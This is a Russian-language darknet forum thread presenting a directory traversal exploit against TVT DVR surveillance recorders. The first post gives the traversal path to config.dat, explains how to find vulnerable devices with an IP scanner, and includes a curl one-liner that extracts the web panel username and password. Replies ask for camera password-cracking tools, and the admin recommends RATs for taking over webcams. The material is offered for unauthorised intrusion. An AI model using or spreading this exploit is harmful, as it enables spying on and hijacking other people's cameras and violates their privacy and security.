Взлом и получение доступа к камерам наблюдения.

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
hulp-met-computer-webcamhack.jpg

Информация Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.
Адрес где лежит конфигурационный файл.

http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat 1

http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat

Парсинг
Именно для меня на данный момент такой способ парсинга самый актуальный. Использую я Advanced IP Scanner Сам сканер.

Выбран диапазон IP. Нас интересует шапка DVR Components Download

2016-03-31_035226.png

Вот такой вид имеет панель входа.
2016-03-31_035226.png

Вот код самого експлойта
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
1
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

Вот пример
2016-03-31_035226.png

Ну и все в итоге у нас юзер и пасс от панели

2016-03-31_035226.png

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
 
  • Лайк
Reactions: AnGel

Shish

Участник

Shish

Участник
1 Апр 2016
14
1
как искать лог-пароль с бек трек не знаю, поясни?
 

ksid

Участник

ksid

Участник
16 Апр 2016
3
0
Может есть у кого прога подбора пароля для камер?
 

dolv

Участник

dolv

Участник
1 Апр 2016
36
3
Недавно натыкался на демонстрацию червя , выглядело как обычный бот , но ты мог полностью управлять его компьютером + подключится к вебкамере . Как можно такое провернуть ?
 

AnGel

Администратор
Команда форума

AnGel

Администратор
Команда форума
27 Авг 2015
3,411
2,025
Недавно натыкался на демонстрацию червя , выглядело как обычный бот , но ты мог полностью управлять его компьютером + подключится к вебкамере . Как можно такое провернуть ?
это обычный RAT'ник
 
  • Лайк
Reactions: Dansolo and dolv

Wertver

Участник

Wertver

Участник
4 Май 2016
13
1
Недавно натыкался на демонстрацию червя , выглядело как обычный бот , но ты мог полностью управлять его компьютером + подключится к вебкамере . Как можно такое провернуть ?
Рат,это как пример
 
  • Лайк
Reactions: dolv

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя